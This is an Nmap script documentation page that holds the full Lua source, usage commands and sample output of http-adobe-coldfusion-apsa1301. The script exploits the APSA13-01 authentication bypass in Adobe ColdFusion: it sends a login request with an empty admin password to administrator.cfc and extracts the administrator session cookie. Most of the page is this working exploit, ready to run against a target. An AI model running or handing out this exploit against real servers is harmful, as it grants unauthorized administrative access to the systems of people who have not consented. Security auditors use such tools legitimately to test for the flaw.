<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File http-adobe-coldfusion-apsa1301</h3>
<b>Script types:</b> portrule<br/>
<b>Categories:</b> auth,auth<br/>
<b>Author:</b> Paulino Calderon <calderon@websec.mx><br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://nmap.org/nsedoc/scripts/http-adobe-coldfusion-apsa1301.html">https://nmap.org/nsedoc/scripts/http-adobe-coldfusion-apsa1301.html</a><br/>
<h3>Summary</h3>
<p>Attempts to exploit an authentication bypass vulnerability in Adobe Coldfusion servers to retrieve a valid administrator's session cookie.</p>
<p>Reference:</p>
<ul>
<li>APSA13-01: <a href="http://www.adobe.com/support/security/advisories/apsa13-01.html" target=_Blank>http://www.adobe.com/support/security/advisories/apsa13-01.html</a></li>
</ul>
<h3>Arguments</h3>
<table>
<tr><td>http-adobe-coldfusion-apsa1301.basepath:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>slaxml.debug:</td><td>See the documentation for the <a href="nmap/libraries/slaxml.htm">slaxml</a> library</td></tr>
<tr><td>http.host:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-body-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-cache-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-pipeline:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.pipeline:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.truncated-ok:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.useragent:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>smbdomain:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbhash:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbnoguest:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbpassword:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbtype:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbusername:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap -sV --script http-adobe-coldfusion-apsa1301 &lt;target&gt;
nmap -p80 --script http-adobe-coldfusion-apsa1301 --script-args basepath=/cf/adminapi/ &lt;target&gt;</pre>
<h3>Output</h3>
<pre>PORT   STATE SERVICE
80/tcp open  http
| http-adobe-coldfusion-apsa1301:
|_  admin_cookie: aW50ZXJhY3RpdmUNQUEyNTFGRDU2NzM1OEYxNkI3REUzRjNCMjJERTgxOTNBNzUxN0NEMA1jZmFkbWlu</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/http.htm">http</a></li>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
<li><a href="nmap/libraries/url.htm">url</a></li>
</ul>
<h3>Code</h3>
<pre>description = [[
Attempts to exploit an authentication bypass vulnerability in Adobe Coldfusion
servers to retrieve a valid administrator&#39;s session cookie.

Reference:
* APSA13-01: http://www.adobe.com/support/security/advisories/apsa13-01.html
]]

---
-- @see http-coldfusion-subzero.nse
-- @see http-vuln-cve2009-3960.nse
-- @see http-vuln-cve2010-2861.nse
--
-- @usage nmap -sV --script http-adobe-coldfusion-apsa1301 &lt;target&gt;
-- @usage nmap -p80 --script http-adobe-coldfusion-apsa1301 --script-args basepath=/cf/adminapi/ &lt;target&gt;
--
-- @output
-- PORT   STATE SERVICE
-- 80/tcp open  http
-- | http-adobe-coldfusion-apsa1301:
-- |_  admin_cookie: aW50ZXJhY3RpdmUNQUEyNTFGRDU2NzM1OEYxNkI3REUzRjNCMjJERTgxOTNBNzUxN0NEMA1jZmFkbWlu
--
-- @args http-adobe-coldfusion-apsa1301.basepath URI path to administrator.cfc. Default: /CFIDE/adminapi/
--
---

author = &quot;Paulino Calderon &lt;calderon@websec.mx&gt;&quot;
license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;
categories = {&quot;exploit&quot;, &quot;vuln&quot;}

local http = require &quot;http&quot;
local shortport = require &quot;shortport&quot;
local stdnse = require &quot;stdnse&quot;
local url = require &quot;url&quot;

portrule = shortport.http
local DEFAULT_PATH = &quot;/CFIDE/adminapi/&quot;
local MAGIC_URI = &quot;administrator.cfc?method=login&amp;adminpassword=&amp;rdsPasswordAllowed=true&quot;
---
-- Extracts the admin cookie by reading CFAUTHORIZATION_cfadmin from the header &#39;set-cookie&#39;
--
local function get_admin_cookie(host, port, basepath)
  local req = http.get(host, port, url.absolute(basepath, MAGIC_URI))
  if not req then return nil end
  for _, ck in ipairs(req.cookies or {}) do
    stdnse.debug2(&quot;Set-Cookie for %q detected in response.&quot;, ck.name)
    if ck.name == &quot;CFAUTHORIZATION_cfadmin&quot; and ck.value:len() &gt; 79 then
      stdnse.debug1(&quot;Extracted cookie:%s&quot;, ck.value)
      return ck.value
    end
  end
  return nil
end

action = function(host, port)
  local output_tab = stdnse.output_table()
  local basepath = stdnse.get_script_args(SCRIPT_NAME..&quot;.basepath&quot;) or DEFAULT_PATH
  local cookie = get_admin_cookie(host, port, basepath)
  if cookie then
    output_tab.admin_cookie = cookie
  else
    return nil
  end

  return output_tab
end</pre>
